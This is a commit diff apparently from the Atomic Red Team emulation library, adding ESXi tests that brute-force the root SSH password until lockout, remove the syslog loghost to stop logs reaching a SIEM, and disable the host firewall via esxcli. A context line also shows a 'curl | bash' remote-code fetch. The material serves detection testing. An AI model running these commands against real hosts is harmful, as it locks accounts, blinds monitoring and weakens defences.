Esxi atomic tests batch 2 (#2650)

* initial esxi commit

* second commit esxi

* use ExternalPayloads folder

* use ExternalPayloads folder

---------

Co-authored-by: clr2of8 <clr2of8@gmail.com>

atomics/T1110.001/T1110.001.md

@@ -40,6 +40,7 @@ In default environments, LDAP and Kerberos connection attempts are less likely t
 
 - [Atomic Test #7 - SUDO Brute Force - FreeBSD](#atomic-test-7---sudo-brute-force---freebsd)
 
+- [Atomic Test #8 - ESXi - Brute Force Until Account Lockout](#atomic-test-8---esxi-brute-force-until-account-lockout)
 
 <br/>
 
@@ -431,3 +432,48 @@ pkg update && pkg install -y sudo curl bash
 
 
 <br/>
+<br/>
+
+## Atomic Test #8 - ESXi - Brute Force Until Account Lockout
+An adversary may attempt to brute force the password of privilleged account for privilege escalation.
+In the process, the TA may lock the account, which can be used for detection. [Reference](https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/#:~:text=A%20ransomware%20group%20attacking%20large,internal%20systems%20after%20establishing%20a)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** f0b443ae-9565-11ee-b9d1-0242ac120002
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| vm_host | Name or IP of the ESXI host | string | atomic.local |
+| plink_file | Path to Putty | path | 'PathToAtomicsFolder\..\atomics\T1110.001\bin\plink.exe' |
+| lockout_threshold | Specify the account lockout threshold configured on the ESXI management server | string | 5 |
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+ $lockout_threshold = [int]"#{lockout_threshold}"
+      for ($var = 1; $var -le $lockout_threshold; $var++) {
+        #{plink_file} -ssh "#{vm_host}" -l root -pw f0b443ae-9565-11ee-b9d1-0242ac120002
+        }
+```
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Check if plink is available.
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+  Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+```
+
+<br/>

atomics/T1110.001/T1110.001.yaml

@@ -263,4 +263,40 @@ atomic_tests:
       curl -s #{remote_url} |bash
     cleanup_command: |
       rmuser -y art
-
+- name: ESXi - Brute Force Until Account Lockout
+  auto_generated_guid: f0b443ae-9565-11ee-b9d1-0242ac120002
+  description: |
+    An adversary may attempt to brute force the password of privilleged account for privilege escalation.
+    In the process, the TA may lock the account, which can be used for detection. [Reference](https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/#:~:text=A%20ransomware%20group%20attacking%20large,internal%20systems%20after%20establishing%20a)
+  supported_platforms:
+  - windows
+  input_arguments:
+    vm_host:
+      description: Specify the host name of the ESXi Server
+      type: string
+      default: atomic.local
+    plink_file:
+      description: Path to Putty
+      type: path
+      default: 'PathToAtomicsFolder\..\ExternalPayloads\plink.exe'
+    lockout_threshold:
+      description: Specify the account lockout threshold configured on the ESXI management server
+      type: string
+      default: "5"
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      The plink executable must be found in the ExternalPayloads folder.
+    prereq_command: |
+      if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+  executor:
+    command: |
+      $lockout_threshold = [int]"#{lockout_threshold}"
+      for ($var = 1; $var -le $lockout_threshold; $var++) {
+        #{plink_file} -ssh "#{vm_host}" -l root -pw f0b443ae-9565-11ee-b9d1-0242ac120002
+        }
+    name: powershell
+    elevation_required: false

atomics/T1560.001/T1560.001.md

@@ -28,6 +28,7 @@ Adversaries may use also third party utilities, such as 7-Zip, WinRAR, and WinZi
 
 - [Atomic Test #9 - Encrypts collected data with AES-256 and Base64](#atomic-test-9---encrypts-collected-data-with-aes-256-and-base64)
 
+- [Atomic Test #10 - ESXi - Remove Syslog remote IP](#atomic-test-10---esxi-remove-syslog-remote-ip)
 
 <br/>
 
@@ -502,3 +503,82 @@ if [ ! -d #{input_folder} ]; then mkdir -p #{input_folder}; cd #{input_folder};
 
 
 <br/>
+<br/>
+
+## Atomic Test #10 - ESXi - Remove Syslog remote IP
+    An adversary may edit the syslog config to remove the loghost in order to prevent or redirect logs being received by SIEM.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 8241dda4-962e-11ee-b9d1-0242ac120002
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| vm_host | Name or IP of the ESXI host | string | atomic.local |
+| plink_file | Path to Putty | path | 'PathToAtomicsFolder\..\atomics\T1560.001\bin\plink.exe' |
+| username | Username used to log into ESXi | string | root |
+| password | Password used to log into ESXI | string | n/a |
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+  # Extract line with IP address from the syslog configuration output
+  #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1560.001\src\esxi_get_loghost.txt | findstr /r "[0-9]*\.[0-9]*\.[0-9]*\." > c:\temp\loghost.txt
+
+  # Replace the IP with "0"
+  #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1560.001\src\esxi_remove_loghost.txt
+
+  # Extract the IP from the line extracted from findstr
+  $inputFilePath = "c:\temp\loghost.txt"
+  $outputFilePath = "c:\temp\loghost_ip.txt"
+
+  $fileContent = Get-Content -Path $inputFilePath -Raw
+
+  if ([string]::IsNullOrWhiteSpace($fileContent)) {
+      Write-Host "The content is $fileContent"
+      Write-Host "The file is empty"
+  } else {
+      # Use a regular expression to extract IP addresses
+      $ipAddresses = [regex]::Matches($fileContent, '(udp|tcp):\/\/[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.*').Value
+      
+      $output = "esxcli system syslog config set --loghost=" + $ipAddresses
+
+      $output | Out-File -FilePath $outputFilePath -Encoding ascii
+      
+      Write-Host "IP addresses extracted and saved to $outputFilePath"
+}
+```
+
+#### Cleanup Commands:
+```powershell
+  # Re-add the initially extracted IP
+  #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m c:\temp\loghost_ip.txt
+  
+  rm c:\temp\loghost_ip.txt
+  rm c:\temp\loghost.txt
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Check if plink is available.
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+  Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+```
+
+
+
+
+<br/>

atomics/T1560.001/T1560.001.yaml

@@ -315,5 +315,73 @@ atomic_tests:
     cleanup_command: 'rm -rf #{input_folder}'
     name: bash
     elevation_required: false
+- name: ESXi - Remove Syslog remote IP
+  auto_generated_guid: 8241dda4-962e-11ee-b9d1-0242ac120002
+  description: |
+    An adversary may edit the syslog config to remove the loghost in order to prevent or redirect logs being received by SIEM.
+  supported_platforms:
+  - windows
+  input_arguments:
+    vm_host:
+      description: Specify the host name of the ESXi Server
+      type: string
+      default: atomic.local
+    plink_file:
+      description: Path to Putty
+      type: path
+      default: 'PathToAtomicsFolder\..\ExternalPayloads\plink.exe'
+    username:
+      description: Username used to log into ESXi
+      type: string
+      default: root
+    password:
+      description: password used to log into ESXI
+      type: string
+      default: n/a
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      The plink executable must be found in the ExternalPayloads folder.
+    prereq_command: |
+      if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+  executor:
+    command: |
+      # Extract line with IP address from the syslog configuration output
+      #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1560.001\src\esxi_get_loghost.txt | findstr /r "[0-9]*\.[0-9]*\.[0-9]*\." > c:\temp\loghost.txt
+      
+      # Replace the IP with "0"
+      #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1560.001\src\esxi_remove_loghost.txt
+      
+      # Extract the IP from the line extracted from findstr
+      $inputFilePath = "c:\temp\loghost.txt"
+      $outputFilePath = "c:\temp\loghost_ip.txt"
+
+      $fileContent = Get-Content -Path $inputFilePath -Raw
+
+      if ([string]::IsNullOrWhiteSpace($fileContent)) {
+          Write-Host "The content is $fileContent"
+          Write-Host "The file is empty"
+      } else {
+          # Use a regular expression to extract IP addresses
+          $ipAddresses = [regex]::Matches($fileContent, '(udp|tcp):\/\/[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.*').Value
+          
+          $output = "esxcli system syslog config set --loghost=" + $ipAddresses
+
+          $output | Out-File -FilePath $outputFilePath -Encoding ascii
+          
+          Write-Host "IP addresses extracted and saved to $outputFilePath"
+      }
+
+    cleanup_command: |
+      # Re-add the initially extracted IP
+      #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m c:\temp\loghost_ip.txt
+      
+      rm c:\temp\loghost_ip.txt
+      rm c:\temp\loghost.txt
+    name: powershell
+    elevation_required: true
 
 

atomics/T1560.001/src/esxi_get_loghost.txt

@@ -0,0 +1 @@
+esxcli system syslog config get

atomics/T1560.001/src/esxi_remove_loghost.txt

@@ -0,0 +1 @@
+esxcli system syslog config set --loghost=0

atomics/T1562.004/T1562.004.md

@@ -50,6 +50,7 @@ Modifying or disabling a system firewall may enable adversary C2 communications,
 
 - [Atomic Test #22 - Blackbit - Disable Windows Firewall using netsh firewall](#atomic-test-22---blackbit---disable-windows-firewall-using-netsh-firewall)
 
+- [Atomic Test #23 - ESXi - Disable Firewall via Esxcli](#atomic-test-23---esxi-disable-firewall-via-esxcli)
 
 <br/>
 
@@ -968,3 +969,51 @@ netsh firewall set opmode mode=enable >nul 2>&1
 
 
 <br/>
+<br/>
+
+## Atomic Test #23 - ESXi - Disable Firewall via Esxcli
+    Adversaries may disable the ESXI firewall via ESXCLI
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 8710d396-96e5-11ee-b9d1-0242ac120002 
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| vm_host | Name or IP of the ESXI host | string | atomic.local |
+| plink_file | Path to Putty | path | 'PathToAtomicsFolder\..\atomics\T1562.004\bin\plink.exe' |
+| username | Username used to log into ESXi | string | root |
+| password | Password used to log into ESXI | string | n/a |
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```cmd
+  #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1562.004\src\esxi_disable_firewall.txt
+```
+
+#### Cleanup Commands:
+```cmd
+  #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1562.004\src\esxi_enable_firewall.txt
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Check if plink is available.
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+  Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+```
+
+<br/>

atomics/T1562.004/T1562.004.yaml

@@ -439,3 +439,42 @@ atomic_tests:
       netsh firewall set opmode mode=enable >nul 2>&1
     name: command_prompt
     elevation_required: true
+- name: ESXi - Disable Firewall via Esxcli
+  auto_generated_guid: 8710d396-96e5-11ee-b9d1-0242ac120002 
+  description: |
+    Adversaries may disable the ESXI firewall via ESXCLI
+  supported_platforms:
+  - windows
+  input_arguments:
+    vm_host:
+      description: Specify the host name of the ESXi Server
+      type: string
+      default: atomic.local
+    plink_file:
+      description: Path to Putty
+      type: path
+      default: 'PathToAtomicsFolder\..\ExternalPayloads\plink.exe'
+    username:
+      description: username used to log into ESXi
+      type: string
+      default: root
+    password:
+      description: password used to log into ESXI
+      type: string
+      default: n/a
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      The plink executable must be found in the ExternalPayloads folder.
+    prereq_command: |
+      if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+  executor:
+    command: |
+      #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1562.004\src\esxi_disable_firewall.txt
+    cleanup_command: |
+      #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1562.004\src\esxi_enable_firewall.txt
+    name: command_prompt
+    elevation_required: false

atomics/T1562.004/src/esxi_disable_firewall.txt

@@ -0,0 +1 @@
+esxcli network firewall set --enabled false

atomics/T1562.004/src/esxi_enable_firewall.txt

@@ -0,0 +1 @@
+esxcli network firewall set --enabled true